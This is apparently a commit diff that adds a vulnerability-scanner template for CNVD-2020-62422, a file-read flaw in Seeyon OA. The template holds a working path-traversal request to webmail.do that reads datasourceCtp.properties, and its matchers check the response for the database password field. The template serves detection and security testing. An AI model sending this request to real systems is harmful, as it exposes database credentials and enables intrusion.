commit
018bbc9075
|
@ -0,0 +1,28 @@
|
||||||
|
id: CNVD-2020-62422
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Seeyon readfile(CNVD-2020-62422)
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/x-msdownload"
|
||||||
|
condition: and
|
||||||
|
part: header
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "ctpDataSource.password"
|
||||||
|
condition: and
|
||||||
|
part: body
|
Loading…
Reference in New Issue